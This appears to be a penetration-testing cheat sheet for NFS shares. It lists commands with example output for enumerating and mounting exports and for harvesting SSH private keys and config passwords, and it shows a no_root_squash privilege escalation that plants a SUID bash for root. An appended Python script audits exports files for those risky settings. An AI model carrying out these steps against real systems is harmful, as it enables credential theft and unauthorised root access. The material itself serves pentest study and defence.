NFS (2049)

Show exports

List NFS shares — Find mountable shares

showmount -e $IP
Example Output
showmount -e 10.10.10.5
/home/backup  *(rw,no_root_squash)
/var/www      *(ro)
(no_root_squash = privesc possible)

Mount share

Mount and browse — Full file access

mkdir /tmp/nfs
mount -t nfs $IP:/<share> /tmp/nfs
Example Output
mkdir /tmp/nfs
mount -t nfs 10.10.10.5:/home/backup /tmp/nfs
ls /tmp/nfs/
  .ssh/  documents/  notes.txt
(Full access to user's home directory)

Check for SSH keys

Private keys — Instant SSH access

ls -la /tmp/nfs/home/*/.ssh/
Example Output
find / -name id_rsa 2>/dev/null
/home/admin/.ssh/id_rsa

cat /home/admin/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA...
(Copy to attacker, chmod 600, ssh -i)

Check for sensitive files

Config files, backups — Passwords in config files

find /tmp/nfs -name '*.conf' -o -name '*.txt' -o -name '*.bak'
Example Output
find /tmp/nfs -name '*.conf' -o -name '*.txt'
/tmp/nfs/notes.txt: 'DB password: MySQLr00t!'
/tmp/nfs/.ssh/id_rsa: -----BEGIN RSA PRIVATE KEY-----

Check permissions / no_root_squash

Privesc via NFS — Write SUID shell, execute on target

If no_root_squash: create SUID binary on share
Example Output
cat /etc/exports shows: no_root_squash

On attacker as root:
cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash

On target:
/home/backup/rootbash -p
# whoami
root
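
Server-side check for the export settings used above (added example, not part of the original cheat sheet): it parses exports(5)-style text and flags no_root_squash, exports open to any host, and the insecure option. The function name audit_exports and the sample lines are constructed; it assumes paths without spaces and does not handle the "-options" default-options syntax.

```python
import re

# One client token: optional host followed by an optional "(opt,opt,...)" list.
TOKEN = re.compile(r"^([^()]*)(?:\(([^)]*)\))?$")

# Constructed sample; the first two lines mirror the export lines shown above.
SAMPLE = """\
/home/backup  *(rw,no_root_squash)
/var/www      *(ro)
/srv/build    10.10.10.0/24 (rw)   # stray space before "(" exports rw to everyone
/srv/docs     10.10.10.7(ro,root_squash)
"""

def audit_exports(text):
    """Return (path, client, finding) tuples for risky entries in exports text."""
    findings = []
    # Join backslash-continued lines before splitting into entries.
    for line in text.replace("\\\n", " ").splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for tok in clients:
            m = TOKEN.match(tok)
            if not m:
                continue  # malformed token, skipped rather than guessed at
            # "(rw)" with no host in front applies to every client.
            host = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            if "no_root_squash" in opts:
                # Client-side root keeps uid 0 on the share.
                findings.append((path, host, "no_root_squash"))
            if host == "*":
                mode = "read-write" if "rw" in opts else "read-only"
                findings.append((path, host, "any host, " + mode))
            if "insecure" in opts:
                # Requests from source ports above 1023 are accepted.
                findings.append((path, host, "insecure"))
    return findings

if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE):
        print(f"{path:15} {client:15} {finding}")
```

On a server, pass it the contents of /etc/exports; an empty result means none of these three settings is present in the file.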